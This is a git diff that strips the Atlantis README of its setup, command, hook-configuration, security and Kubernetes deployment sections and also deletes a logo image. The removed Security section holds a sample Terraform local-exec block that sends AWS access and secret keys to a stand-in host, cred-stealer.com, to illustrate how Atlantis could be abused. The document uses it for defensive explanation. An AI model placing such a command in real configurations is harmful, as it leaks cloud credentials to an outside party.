-* [AWS Credentials](#aws-credentials)
-* [Glossary](#glossary)
-    * [Project](#project)
-    * [Workspace/Environment](#workspaceenvironment)
-* [FAQ](#faq)
-* [Contributing](#contributing)
-* [Credits](#credits)
-
-## Features
-➜ Collaborate on Terraform with your team
-- Run terraform `plan` and `apply` **from GitHub pull requests** so everyone can review the output
-- **Lock workspaces** until pull requests are merged to prevent concurrent modification and confusion
-
-➜ Developers can write Terraform safely
-- **No need to distribute AWS credentials** to your whole team. Developers can submit Terraform changes and run `plan` and `apply` directly from the pull/merge request
-- Optionally, require a **review and approval** prior to running `apply`
-
-➜ Also
-- Support **multiple versions of Terraform** with a simple project config file
-
-## Atlantis Works With
-* GitHub (public, private or enterprise) and GitLab (public, private or enterprise)
-* Any Terraform version (see [Terraform Versions](#terraform-version))
-* Can be run with a [single binary](https://github.com/runatlantis/atlantis/releases) or with our [Docker image](https://hub.docker.com/r/runatlantis/atlantis/)
-* Any repository structure
-
 ## Getting Started
-Download from [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases)
-
-Run
-```
-./atlantis testdrive
-```
-This mode sets up Atlantis on a test repo so you can try it out. It will
-- fork an example terraform project
-- install terraform (if not already in your PATH)
-- install ngrok so we can expose Atlantis to GitHub
-- start Atlantis
-
-If you're ready to permanently set up Atlantis see [Production-Ready Deployment](#production-ready-deployment).
-
-## Pull/Merge Request Commands
-Atlantis currently supports three commands that can be run via pull request comments (or merge request comments on GitLab):
-
-![Help Command](./docs/pr-comment-help.png)
-#### `atlantis help`
-View help
-
----
-![Plan Command](./docs/pr-comment-plan.png)
-#### `atlantis plan [options] -- [terraform plan flags]`
-Runs `terraform plan` for the changes in this pull request.
-
-Options:
-* `-d directory` Which directory to run plan in relative to root of repo. Use `.` for root. If not specified, will attempt to run plan for all Terraform projects we think were modified in this changeset.
-* `-w workspace` Switch to this [Terraform workspace](https://www.terraform.io/docs/state/workspaces.html) before planning. Defaults to `default`. If not using Terraform workspaces you can ignore this.
-* `--verbose` Append Atlantis log to comment.
-
-Additional Terraform flags:
-
-If you need to run `terraform plan` with additional arguments, like `-target=resource` or `-var 'foo-bar'`
-you can append them to the end of the comment after `--`, ex.
-```
-atlantis plan -d dir -- -var 'foo=bar'
-```
-If you always need to append a certain flag, see [Project-Specific Customization](#project-specific-customization).
-
----
-![Apply Command](./docs/pr-comment-apply.png)
-#### `atlantis apply [options] -- [terraform apply flags]`
-Runs `terraform apply` for the plans that match the directory and workspace.
-
-Options:
-* `-d directory` Apply the plan for this directory, relative to root of repo. Use `.` for root. If not specified, will run apply against all plans created for this workspace.
-* `-w workspace` Apply the plan for this [Terraform workspace](https://www.terraform.io/docs/state/workspaces.html). Defaults to `default`. If not using Terraform workspaces you can ignore this.
-* `--verbose` Append Atlantis log to comment.
-
-Additional Terraform flags:
-
-Same as with `atlantis plan`.
-
-## Project Structure
-Atlantis supports several Terraform project structures:
-- a single Terraform project at the repo root
-```
-.
-├── main.tf
-└── ...
-```
--  multiple project folders in a single repo (monorepo)
-```
-.
-├── project1
-│   ├── main.tf
-|   └── ...
-└── project2
-    ├── main.tf
-    └── ...
-```
--  one folder per set of configuration
-```
-.
-├── staging
-│   ├── main.tf
-|   └── ...
-└── production
-    ├── main.tf
-    └── ...
-```
--  using `env/{env}.tfvars` to define workspace specific variables. This works in both multi-project repos and single-project repos.
-```
-.
-├── env
-│   ├── production.tfvars
-│   └── staging.tfvars
-└── main.tf
-```
-or
-```
-.
-├── project1
-│   ├── env
-│   │   ├── production.tfvars
-│   │   └── staging.tfvars
-│   └── main.tf
-└── project2
-    ├── env
-    │   ├── production.tfvars
-    │   └── staging.tfvars
-    └── main.tf
-```
-With the above project structure you can de-duplicate your Terraform code between workspaces/environments without requiring extensive use of modules. At Hootsuite we found this project format to be very successful and use it in all of our 100+ Terraform repositories.
-
-## Workspaces/Environments
-Terraform introduced [Workspaces](https://www.terraform.io/docs/state/workspaces.html) in 0.9. They allow for
-> a single directory of Terraform configuration to be used to manage multiple distinct sets of infrastructure resources
-
-If you're using a Terraform version >= 0.9.0, Atlantis supports workspaces through the `-w` flag.
-For example,
-```
-atlantis plan -w staging
-```
-
-If a workspace is specified, Atlantis will use `terraform workspace select {workspace}` prior to running `terraform plan` or `terraform apply`.
-
-If you're using the `env/{env}.tfvars` [project structure](#project-structure) we will also append `-var-file=env/{env}.tfvars` to `plan` and `apply`.
-
-If no workspace is specified, we'll use the `default` workspace by default.
-This replicates Terraform's default behaviour which also uses the `default` workspace.
-
-## Terraform Versions
-By default, Atlantis will use the `terraform` executable that is in its path. To use a specific version of Terraform just install that version on the server that Atlantis is running on.
-
-If you would like to use a different version of Terraform for some projects but not for others
-1. Install the desired version of Terraform into the `$PATH` of where Atlantis is running and name it `terraform{version}`, ex. `terraform0.8.8`.
-2. In the project root (which is not necessarily the repo root) of any project that needs a specific version, create an `atlantis.yaml` file as follows
-```
----
-terraform_version: 0.8.8 # set to desired version
-```
-
-So your project structure will look like
-```
-.
-├── main.tf
-└── atlantis.yaml
-```
-Now when Atlantis executes it will use the `terraform{version}` executable.
-
-## Project-Specific Customization
-An `atlantis.yaml` config file in your project root (which is not necessarily the repo root) can be used to customize
-- what commands Atlantis runs **before** `init`, `get`, `plan` and `apply` with `pre_init`, `pre_get`, `pre_plan` and `pre_apply`
-- what commands Atlantis runs **after** `plan` and `apply` with `post_plan` and `post_apply`
-- additional arguments to be supplied to specific terraform commands with `extra_arguments`
-    - the commmands that we support adding extra args to are `init`, `get`, `plan` and `apply`
-- what version of Terraform to use (see [Terraform Versions](#terraform-versions))
-
-The schema of the `atlantis.yaml` project config file is
-
-```yaml
-# atlantis.yaml
----
-terraform_version: 0.8.8 # optional version
-# pre_init commands are run when the Terraform version is >= 0.9.0
-pre_init:
-  commands:
-  - "curl http://example.com"
-# pre_get commands are run when the Terraform version is < 0.9.0
-pre_get:
-  commands:
-  - "curl http://example.com"
-pre_plan:
-  commands:
-  - "curl http://example.com"
-post_plan:
-  commands:
-  - "curl http://example.com"
-pre_apply:
-  commands:
-  - "curl http://example.com"
-post_apply:
-  commands:
-  - "curl http://example.com"
-extra_arguments:
-  - command_name: plan
-    arguments:
-    - "-var-file=terraform.tfvars"
-```
-
-When running the `pre_plan`, `post_plan`, `pre_apply`, and `post_apply` commands the following environment variables are available
-- `WORKSPACE`: if a workspace argument is supplied to `atlantis plan` or `atlantis apply`, ex `atlantis plan -w staging`, this will
-be the value of that argument. Else it will be `default`
-- `ATLANTIS_TERRAFORM_VERSION`: local version of `terraform` or the version from `terraform_version` if specified, ex. `0.8.8`
-- `DIR`: absolute path to the root of the project on disk
-
-## Locking
-When `plan` is run, the [project](#project) and [workspace](#workspaceenvironment) (**but not the whole repo**) are **Locked** until an `apply` succeeds **and** the pull request/merge request is merged.
-This protects against concurrent modifications to the same set of infrastructure and prevents
-users from seeing a `plan` that will be invalid if another pull request is merged.
-
-If you have multiple directories inside a single repository, only the directory will be locked. Not the whole repo.
-
-To unlock the project and workspace without completing an `apply` and merging, click the link
-at the bottom of the plan comment to discard the plan and delete the lock.
-Once a plan is discarded, you'll need to run `plan` again prior to running `apply` when you go back to that pull request.
-
-## Approvals
-If you'd like to require pull/merge requests to be approved prior to a user running `atlantis apply` simply run Atlantis with the `--require-approval` flag.
-By default, no approval is required.
-
-For more information on GitHub pull request reviews and approvals see: https://help.github.com/articles/about-pull-request-reviews/
-
-For more information on GitLab merge request reviews and approvals (only supported on GitLab Enterprise) see: https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html.
-
-## Security
-Because you usually run Atlantis on a server with credentials that allow access to your infrastructure it's important that you deploy Atlantis securely.
-
-Atlantis could be exploited by
-* Running `terraform apply` on a malicious Terraform file with [local-exec](https://www.terraform.io/docs/provisioners/local-exec.html)
-```tf
-resource "null_resource" "null" {
-  provisioner "local-exec" {
-    command = "curl https://cred-stealer.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
-  }
-}
-```
-* Running malicious hook commands specified in an `atlantis.yaml` file.
-* Someone adding `atlantis plan/apply` comments on your valid pull requests causing terraform to run when you don't want it to.
-
-### Mitigations
-#### Don't Use On Public Repos
-Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos until Atlantis gets an authentication system.
-
-#### Don't Use `--allow-fork-prs`
-If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false)
-because anyone can open up a pull request from their fork to your repo.
-
-#### `--repo-whitelist`
-Atlantis requires you to specify a whitelist of repositories it will accept webhooks from via the `--repo-whitelist` flag.
-For example:
-* Specific repositories: `--repo-whitelist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
-* Your whole organization: `--repo-whitelist=github.com/runatlantis/*`
-* Every repository in your GitHub Enterprise install: `--repo-whitelist=github.yourcompany.com/*`
-* All repositories: `--repo-whitelist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
-
-This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
-
-#### Webhook Secrets
-Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables.
-Even with the `--repo-whitelist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is whitelisted.
-Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
-
-## Production-Ready Deployment
-### Install Terraform
-`terraform` needs to be in the `$PATH` for Atlantis.
-Download from https://www.terraform.io/downloads.html
-```
-unzip path/to/terraform_*.zip -d /usr/local/bin
-```
-Check that it's in your `$PATH`
-```
-$ terraform version
-Terraform v0.10.0
-```
-If you want to use a different version of Terraform see [Terraform Versions](#terraform-versions)
-
-### Hosting Atlantis
-Atlantis needs to be hosted somewhere that github.com/gitlab.com or your GitHub/GitLab Enterprise installation can reach. Developers in your organization also need to be able to access Atlantis to view the UI and to delete locks.
-
-By default Atlantis runs on port `4141`. This can be changed with the `--port` flag.
-
-### Add GitHub Webhook
-Once you've decided where to host Atlantis you can add it as a Webhook to GitHub.
-If you already have a GitHub organization we recommend installing the webhook at the **organization level** rather than on each repository, however both methods will work.
-
-> If you're not sure if you have a GitHub organization see https://help.github.com/articles/differences-between-user-and-organization-accounts/
-
-If you're installing on the organization, navigate to your organization's page and click **Settings**.
-If installing on a single repository, navigate to the repository home page and click **Settings**.
-- Select **Webhooks** or **Hooks** in the sidebar
-- Click **Add webhook**
-- set **Payload URL** to `http://$URL/events` where `$URL` is where Atlantis is hosted. **Be sure to add `/events`**
-- set **Content type** to `application/json`
-- set **Secret** to a random key (https://www.random.org/strings/). You'll need to pass this value to the `--gh-webhook-secret` option when you start Atlantis
-- select **Let me select individual events**
-- check the boxes
-	- **Pull request reviews**
-	- **Pushes**
-	- **Issue comments**
-	- **Pull requests**
-- leave **Active** checked
-- click **Add webhook**
-
-### Add GitLab Webhook
-If you're using GitLab, navigate to your project's home page in GitLab
-- Click **Settings > Integrations** in the sidebar
-- set **URL** to `http://$URL/events` where `$URL` is where Atlantis is hosted. **Be sure to add `/events`**
-- leave **Secret Token** blank or set this to a random key (https://www.random.org/strings/). If you set it, you'll need to use the `--gitlab-webhook-secret` option when you start Atlantis
-- check the boxes
-    - **Push events**
-    - **Comments**
-    - **Merge Request events**
-- leave **Enable SSL verification** checked
-- click **Add webhook**
-
-### Create a GitHub Token
-We recommend creating a new user in GitHub named **atlantis** that performs all API actions, however you can use any user.
-
-**NOTE: The Atlantis user must have "Write permissions" (for repos in an organization) or be a "Collaborator" (for repos in a user account) to be able to set commit statuses:**
-![Atlantis status](./docs/status.png)
-
-Once you've created the user (or have decided to use an existing user) you need to create a personal access token.
-- follow [https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token)
-- copy the access token
-
-### Create a GitLab Token
-We recommend creating a new user in GitLab named **atlantis** that performs all API actions, however you can use any user.
-Once you've created the user (or have decided to use an existing user) you need to create a personal access token.
-- follow [https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token](https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token)
-- create a token with **api** scope
-- copy the access token
-
-### Start Atlantis
-Now you're ready to start Atlantis!
-
-If you're using GitHub, run:
-```
-$ atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET
-2049/10/6 00:00:00 [WARN] server: Atlantis started - listening on port 4141
-```
-
-If you're using GitLab, run:
-```
-$ atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET
-2049/10/6 00:00:00 [WARN] server: Atlantis started - listening on port 4141
-```
-
-- `$URL` is the URL that Atlantis can be reached at
-- `$USERNAME` is the GitHub/GitLab username you generated the token for
-- `$TOKEN` is the access token you created. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_TOKEN` or `ATLANTIS_GITLAB_TOKEN`
-- `$SECRET` is the random key you used for the webhook secret. If you left the secret blank then don't specify this flag. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_WEBHOOK_SECRET` or `ATLANTIS_GITLAB_WEBHOOK_SECRET`
-
-Atlantis is now running!
-**We recommend running it under something like Systemd or Supervisord.**
-
-### Docker
-Atlantis also ships inside a docker image. Run the docker image:
-
-```bash
-docker run runatlantis/atlantis:latest server <required options>
-```
-
-#### Usage
-If you need to modify the Docker image that we provide, for instance to add a specific version of Terraform, you can do something like this:
-
-* Create a custom docker file
-```bash
-vim Dockerfile-custom
-```
-
-```dockerfile
-FROM runatlantis/atlantis
-
-# copy a terraform binary of the version you need
-COPY terraform /usr/local/bin/terraform
-```
-
-* Build docker image
-
-```bash
-docker build -t {YOUR_DOCKER_ORG}/atlantis-custom -f Dockerfile-custom .
-```
-
-* Run docker image
-
-```bash
-docker run {YOUR_DOCKER_ORG}/atlantis-custom server --gh-user=GITHUB_USERNAME --gh-token=GITHUB_TOKEN
-```
-
-### Kubernetes
-Atlantis can be deployed into Kubernetes as a
-[Deployment](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/)
-or as a [Statefulset](https://kubernetes.io/docs/concepts/workloads/controllers/statefulset/) with persistent storage.
-
-StatefulSet is recommended because Atlantis stores its data on disk and so if your Pod dies
-or you upgrade Atlantis, you won't lose the data. On the other hand, the only data that
-Atlantis has right now is any plans that haven't been applied and Atlantis locks. If
-Atlantis loses that data, you just need to run `atlantis plan` again so it's not the end of the world.
-
-Regardless of whether you choose a Deployment or StatefulSet, first create a Secret with the webhook secret and access token:
-```
-echo -n "yourtoken" > token
-echo -n "yoursecret" > webhook-secret
-kubectl create secret generic atlantis-vcs --from-file=token --from-file=webhook-secret
-```
-
-Next, edit the manifests below as follows:
-1. Replace `<VERSION>` in `image: runatlantis/atlantis:<VERSION>` with the most recent version from https://github.com/runatlantis/atlantis/releases/latest.
-    * NOTE: You never want to run with `:latest` because if your Pod moves to a new node, Kubernetes will pull the latest image and you might end
-up upgrading Atlantis by accident!
-2. Replace `value: github.com/yourorg/*` under `name: ATLANTIS_REPO_WHITELIST` with the whitelist pattern
-for your Terraform repos. See [--repo-whitelist](#--repo-whitelist) for more details.
-3. If you're using GitHub:
-    1. Replace `<YOUR_GITHUB_USER>` with the username of your Atlantis GitHub user without the `@`.
-    2. Delete all the `ATLANTIS_GITLAB_*` environment variables.
-4. If you're using GitLab:
-    1. Replace `<YOUR_GITLAB_USER>` with the username of your Atlantis GitLab user without the `@`.
-    2. Delete all the `ATLANTIS_GH_*` environment variables.
-
-#### StatefulSet Manifest
-<details>
- <summary>Expand...</summary>
-
-```yaml
-apiVersion: apps/v1
-kind: StatefulSet
-metadata:
-  name: atlantis
-spec:
-  serviceName: atlantis
-  replicas: 1
-  updateStrategy:
-    type: RollingUpdate
-    rollingUpdate:
-      partition: 0
-  selector:
-    matchLabels:
-      app: atlantis
-  template:
-    metadata:
-      labels:
-        app: atlantis
-    spec:
-      securityContext:
-        fsGroup: 1000 # Atlantis group (1000) read/write access to volumes.
-      containers:
-      - name: atlantis
-        image: runatlantis/atlantis:v<VERSION> # 1. Replace <VERSION> with the most recent release.
-        env:
-        - name: ATLANTIS_REPO_WHITELIST
-          value: github.com/yourorg/* # 2. Replace this with your own repo whitelist.
-
-        ### GitHub Config ###
-        - name: ATLANTIS_GH_USER
-          value: <YOUR_GITHUB_USER> # 3i. If you're using GitHub replace <YOUR_GITHUB_USER> with the username of your Atlantis GitHub user without the `@`.
-        - name: ATLANTIS_GH_TOKEN
-          valueFrom:
-            secretKeyRef:
-              name: atlantis-vcs
-              key: token
-        - name: ATLANTIS_GH_WEBHOOK_SECRET
-          valueFrom:
-            secretKeyRef:
-              name: atlantis-vcs
-              key: webhook-secret
-
-        ### GitLab Config ###
-        - name: ATLANTIS_GITLAB_USER
-          value: <YOUR_GITLAB_USER> # 4i. If you're using GitLab replace <YOUR_GITLAB_USER> with the username of your Atlantis GitLab user without the `@`.
-        - name: ATLANTIS_GITLAB_TOKEN
-          valueFrom:
-            secretKeyRef:
-              name: atlantis-vcs
-              key: token
-        - name: ATLANTIS_GITLAB_WEBHOOK_SECRET
-          valueFrom:
-            secretKeyRef:
-              name: atlantis-vcs
-              key: webhook-secret
-
-        - name: ATLANTIS_DATA_DIR
-          value: /atlantis
-        - name: ATLANTIS_PORT
-          value: "4141" # Kubernetes sets an ATLANTIS_PORT variable so we need to override.
-        volumeMounts:
-        - name: atlantis-data
-          mountPath: /atlantis
-        ports:
-        - name: atlantis
-          containerPort: 4141
-        resources:
-          requests:
-            memory: 256Mi
-            cpu: 100m
-          limits:
-            memory: 256Mi
-            cpu: 100m
-  volumeClaimTemplates:
-  - metadata:
-      name: atlantis-data
-    spec:
-      accessModes: ["ReadWriteOnce"] # Volume should not be shared by multiple nodes.
-      resources:
-        requests:
-          # The biggest thing Atlantis stores is the Git repo when it checks it out.
-          # It deletes the repo after the pull request is merged.
-          storage: 5Gi
----
-apiVersion: v1
-kind: Service
-metadata:
-  name: atlantis
-spec:
-  ports:
-  - name: atlantis
-    port: 80
-    targetPort: 4141
-  selector:
-    app: atlantis
-```
-</details>
-
-
-#### Deployment Manifest
-<details>
- <summary>Expand...</summary>
-
-```yaml
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: atlantis
-  labels:
-    app: atlantis
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app: atlantis
-  template:
-    metadata:
-      labels:
-        app: atlantis
-    spec:
-      containers:
-      - name: atlantis
-        image: runatlantis/atlantis:v<VERSION> # 1. Replace <VERSION> with the most recent release.
-        env:
-        - name: ATLANTIS_REPO_WHITELIST
-          value: github.com/yourorg/* # 2. Replace this with your own repo whitelist.
-
-        ### GitHub Config ###
-        - name: ATLANTIS_GH_USER
-          value: <YOUR_GITHUB_USER> # 3i. If you're using GitHub replace <YOUR_GITHUB_USER> with the username of your Atlantis GitHub user without the `@`.
-        - name: ATLANTIS_GH_TOKEN
-          valueFrom:
-            secretKeyRef:
-              name: atlantis-vcs
-              key: token
-        - name: ATLANTIS_GH_WEBHOOK_SECRET
-          valueFrom:
-            secretKeyRef:
-              name: atlantis-vcs
-              key: webhook-secret
-
-        ### GitLab Config ###
-        - name: ATLANTIS_GITLAB_USER
-          value: <YOUR_GITLAB_USER> # 4i. If you're using GitLab replace <YOUR_GITLAB_USER> with the username of your Atlantis GitLab user without the `@`.
-        - name: ATLANTIS_GITLAB_TOKEN
-          valueFrom:
-            secretKeyRef:
-              name: atlantis-vcs
-              key: token
-        - name: ATLANTIS_GITLAB_WEBHOOK_SECRET
-          valueFrom:
-            secretKeyRef:
-              name: atlantis-vcs
-              key: webhook-secret
-        - name: ATLANTIS_PORT
-          value: "4141" # Kubernetes sets an ATLANTIS_PORT variable so we need to override.
-        ports:
-        - name: atlantis
-          containerPort: 4141
-        resources:
-          requests:
-            memory: 256Mi
-            cpu: 100m
-          limits:
-            memory: 256Mi
-            cpu: 100m
----
-apiVersion: v1
-kind: Service
-metadata:
-  name: atlantis
-spec:
-  ports:
-  - name: atlantis
-    port: 80
-    targetPort: 4141
-  selector:
-    app: atlantis
-```
-</details>
-
-#### Routing and SSL
-The manifests above create a Kubernetes `Service` of type `ClusterIP` which isn't accessible outside your cluster.
-Depending on how you're doing routing into Kubernetes, you may want to use a `LoadBalancer` so that Atlantis is accessible
-to GitHub/GitLab and your internal users.
-
-If you want to add SSL you can use something like https://github.com/jetstack/cert-manager to generate SSL
-certs and mount them into the Pod. Then set the `ATLANTIS_SSL_CERT_FILE` and `ATLANTIS_SSL_KEY_FILE` environment variables to enable SSL.
-You could also set up SSL at your LoadBalancer.
-
-### AWS Fargate
-
-If you'd like to run Atlantis on [AWS Fargate](https://aws.amazon.com/fargate/) check out the Atlantis module on the Terraform Module Registry: https://registry.terraform.io/modules/terraform-aws-modules/atlantis/aws
-
-### Testing Out Atlantis on GitHub
-
-If you'd like to test out Atlantis before running it on your own repositories you can fork our example repo.
-
-- Fork https://github.com/runatlantis/atlantis-example
-- If you didn't add the Webhook as to your organization add Atlantis as a Webhook to the forked repo (see [Add GitHub Webhook](#add-github-webhook))
-- Now that Atlantis can receive events you should be able to comment on a pull request to trigger Atlantis. Create a pull request
-	- Click **Branches** on your forked repo's homepage
-	- click the **New pull request** button next to the `example` branch
-	- Change the `base` to `{your-repo}/master`
-	- click **Create pull request**
-- Now you can test out Atlantis
-	- Create a comment `atlantis help` to see what commands you can run from the pull request
-	- `atlantis plan` will run `terraform plan` behind the scenes. You should see the output commented back on the pull request. You should also see some logs show up where you're running `atlantis server`
-	- `atlantis apply` will run `terraform apply`. Since our pull request creates a `null_resource` (which does nothing) this is safe to do.
-
-## Server Configuration
-Configuration for `atlantis server` can be specified via command line flags, environment variables or a YAML config file.
-Config file values are overridden by environment variables which in turn are overridden by flags.
-
-### YAML
-To use a yaml config file, run atlantis with `--config /path/to/config.yaml`.
-The keys of your config file should be the same as the flag, ex.
-```yaml
----
-gh-token: ...
-log-level: ...
-```
-
-### Environment Variables
-All flags can be specified as environment variables. You need to convert the flag's `-`'s to `_`'s, uppercase all the letters and prefix with `ATLANTIS_`.
-For example, `--gh-user` can be set via the environment variable `ATLANTIS_GH_USER`.
-
-To see a list of all flags and their descriptions run `atlantis server --help`
-
-## AWS Credentials
-Atlantis simply shells out to `terraform` so you don't need to do anything special with AWS credentials.
-As long as `terraform` works where you're hosting Atlantis, then Atlantis will work.
-See https://www.terraform.io/docs/providers/aws/#authentication for more detail.
-
-### Multiple AWS Accounts
-Atlantis supports multiple AWS accounts through the use of Terraform's
-[AWS Authentication](https://www.terraform.io/docs/providers/aws/#authentication).
-
-If you're using the [Shared Credentials file](https://www.terraform.io/docs/providers/aws/#shared-credentials-file)
-you'll need to ensure the server that Atlantis is executing on has the corresponding credentials file.
-
-If you're using [Assume role](https://www.terraform.io/docs/providers/aws/#assume-role)
-you'll need to ensure that the credentials file has a `default` profile that is able
-to assume all required roles.
-
-[Environment variables](https://www.terraform.io/docs/providers/aws/#environment-variables) authentication
-won't work for multiple accounts since Atlantis wouldn't know which environment variables to execute
-Terraform with.
-
-### Assume Role Session Names
-Atlantis injects the Terraform variable `atlantis_user` and sets it to the GitHub username of
-the user that is running the Atlantis command. This can be used to dynamically name the assume role
-session. This is used at Hootsuite so AWS API actions can be correlated with a specific user.
-
-To take advantage of this feature, use Terraform's [built-in support](https://www.terraform.io/docs/providers/aws/#assume-role) for assume role
-and use the `atlantis_user` terraform variable
-
-```hcl
-provider "aws" {
-  assume_role {
-    role_arn     = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
-    session_name = "${var.atlantis_user}"
-  }
-}
-
-# need to define the atlantis_user variable to avoid terraform errors
-variable "atlantis_user" {
-  default = "atlantis_user"
-}
-```
-
-If you're also using the [S3 Backend](https://www.terraform.io/docs/backends/types/s3.html)
-make sure to add the `role_arn` option:
-
-```hcl
-terraform {
-  backend "s3" {
-    bucket   = "mybucket"
-    key      = "path/to/my/key"
-    region   = "us-east-1"
-    role_arn = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
-    # can't use var.atlantis_user as the session name because
-    # interpolations are not allowed in backend configuration
-    # session_name = "${var.atlantis_user}" WON'T WORK
-  }
-}
-```
-
-Terraform doesn't support interpolations in backend config so you will not be
-able to use `session_name = "${var.atlantis_user}"`. However, the backend assumed
-role is only used for state-related API actions. Any other API actions will be performed using
-the assumed role specified in the `aws` provider and will have the session named as the GitHub user.
-
-## Glossary
-#### Project
-A Terraform project. Multiple projects can be in a single GitHub repo.
-We identify a project by its repo **and** the path to the root of the project within that repo.
-
-#### Workspace/Environment
-A Terraform workspace. See [terraform docs](https://www.terraform.io/docs/state/workspaces.html) for more information.
-
-## FAQ
-**Q: Does Atlantis affect Terraform [remote state](https://www.terraform.io/docs/state/remote.html)?**
-
-A: No. Atlantis does not interfere with Terraform remote state in any way. Under the hood, Atlantis is simply executing `terraform plan` and `terraform apply`.
-
-**Q: How does Atlantis locking interact with Terraform [locking](https://www.terraform.io/docs/state/locking.html)?**
-
-A: Atlantis provides locking of pull requests that prevents concurrent modification of the same infrastructure (Terraform project) whereas Terraform locking only prevents two concurrent `terraform apply`'s from happening.
-
-Terraform locking can be used alongside Atlantis locking since Atlantis is simply executing terraform commands.
-
-**Q: How to run Atlantis in high availability mode? Does it need to be?**
-
-A: Atlantis server can easily be run under the supervision of a init system like `upstart` or `systemd` to make sure `atlantis server` is always running.
-
-Atlantis currently stores all locking and Terraform plans locally on disk under the `--data-dir` directory (defaults to `~/.atlantis`). Because of this there is currently no way to run two or more Atlantis instances concurrently.
-
-However, if you were to lose the data, all you would need to do is run `atlantis plan` again on the pull requests that are open. If someone tries to run `atlantis apply` after the data has been lost then they will get an error back, so they will have to re-plan anyway.
-
-**Q: How to add SSL to Atlantis server?**
-
-A: First, you'll need to get a public/private key pair to serve over SSL.
-These need to be in a directory accessible by Atlantis. Then start `atlantis server` with the `--ssl-cert-file` and `--ssl-key-file` flags.
-See `atlantis server --help` for more information.
-
-**Q: How can I get Atlantis up and running on AWS?**
+[www.runatlantis.io/guide](https://www.runatlantis.io/guide)
 
-A: There is [terraform-aws-atlantis](https://github.com/terraform-aws-modules/terraform-aws-atlantis) project where complete Terraform configurations for running Atlantis on AWS Fargate are hosted. Tested and maintained.
+## Documentation
+[www.runatlantis.io/docs](https://www.runatlantis.io/docs)
 
 ## Contributing
 Want to contribute? Check out [CONTRIBUTING](https://github.com/runatlantis/atlantis/blob/master/CONTRIBUTING.md).
diff --git a/docs/atlantis-logo.png b/docs/atlantis-logo.png
deleted file mode 100644
index 748e26771af638c3dea9a2c31626213b7e43bf38..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 14750
zcmV;PIbp_$P)<h;3K|Lk000e1NJLTq008g+008g^1^@s6K2_<G0022<Nkl<Zc-rlK
z2Y8g%mG;<ioK4m#&aU&vDVt5=-Di{RCi|>oJ5B(JDtZ^a8Uv;Z(N#yiOi`mFX;eT0
zL<iGE5g<Ak5Sp3qn;D7TOfg_O(&+u~`DO$H)HQwXd7k$Xk_OE;_n!Bja?d?iCgb8V
zA_v}-Yw@=H)SaKipLzVdBoTjAh!vfcBE~56=4hp0&SLmdWvD7vid82WM74<XDiPP&
z*W2uO_f%rl1C;@f)doCcFf&v#JYlbS$bR=Nd)*zCXuiq*eMKdh%h=a53`g1Tcd_?b
zrPP~KmHNu*Y9sn7^zez*<G&f+mlxq3>Dkyb@|oho1$ZOPgzqs@yc2&0?<%wpey-3z
z`#*(<VM-I?7ztNdiFKV3u!;c=MwLpy*X$XN(X%KFh^J>$nAkJ2XN|vrcj?*bGtg(@
z6UxP-#lHaGNjz}#hp}hz|DsFr`ve18DTK-?j37&yB`jvv^M=)0!o^WZ&&sU-0eW`&
z4D?x|P53>1w!{PYA$?Xp<6PWcl-Kdk>QelgDfnL!^cCHh8yu<>&1;xNGco0_a09Y7
z3iMeRsmtiI(PyO3N}riNJB<O?1TO9o!xrJKI1}DW5b!_oLPe)U5rNFQ<|~D&awoaL
z&O#M^W~I)&g2q6>#)8H~UV@*|7;#PE;!=sHIMe<261C4hR_HK{#f>VZh&{~3yrr@v
zk>KSp(^$}$(AdxzB^vNCEp$8~#>H6~s5j=6<Ht!%5gAEGG9*zPs}k{zms#4TC&t(q
zQ5K!XjE&z&r4FCaSn@;|7l(+#gx@C$7_2l@sa5)_A}LeLEp5}|W;SNlEH{l|5{+rR
z79Y^!$hC}%ZQbM(SAGyLz*lKN2(z>sn9`LoOH#p!XsaX`D%jYT)7a7&E7@4fuUz>7
z*E}vQBW?+P#@xI?Ou;k^$CN_VJx)0Lg2tG}S{id^m1z#RCUR+#s7^lqjY3yBK_yge
zU?6MzjK{VPkCmTEo(`J>X)g4Sf5SDCOT7}Wee!|QU=C7?*vn$HE1bA4LS!}<G$+ix
z4zk3_T)5Pbn9~n`snnb2C`I#eYbLpplgITcz@!Yeh~sRY=FpsR&Gm9gK8K&E_2x-*
zFo3yh_c?LhA$whArn#ayqq&PebN5}Y$=;Tn(&BBUu5y4{tUAryv!`ml4dj*uBGTNk
zIaHKZ4x~Bdn(g62MfS0!PyehG%!Ql)o|e5f7siTD|I80kc%aacw|D{nt`L#J+^?rx
z;XQRfx$3D>L@Ld-bj*>9drJXZjTKt_oK5OPmBD<TXOz7pbIs;jVK7gMJ@N4U0&bDr
